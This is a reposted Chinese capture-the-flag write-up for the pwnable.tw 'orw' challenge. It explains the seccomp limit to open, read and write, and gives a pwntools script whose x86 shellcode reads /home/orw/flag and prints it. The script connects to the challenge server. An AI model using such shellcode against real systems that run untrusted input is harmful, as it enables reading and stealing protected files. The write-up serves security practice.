pwnable.tw - orw
Posted PolluxAvenger
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pwnable.tw - orw相关的知识,希望对你有一定的参考价值。
简单概览
与 start 不同,该程序使用动态链接
提示仅允许有限的系统调用 open read write 函数
程序运行
哪怕是输入一个字母,程序仍然会出现段错误
检查安全措施
可见栈上开了 CANARY
程序
在 IDA 中反编译可见:
函数 orw_seccomp 反编译:
程序从终端读入内容,存放在 shellcode,然后执行该命令
所以大体过程为先 open 文件,然后 read 读出内容,再 write 打印到终端
from pwn import *
open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"
read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"
write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"
shellcode = open_shellcode + read_shellcode + write_shellcode
payload = asm(shellcode)
io = remote("chall.pwnable.tw", 10001)
io.recvuntil("shellcode:")
io.sendline(payload)
print io.recv()
io.interactive()
/home/orw/flag 转换为 16 进制为 2f686f6d652f6f72772f666c6167
,即压栈数据,还要补零
执行就可以得到 flag
以上是关于pwnable.tw - orw的主要内容,如果未能解决你的问题,请参考以下文章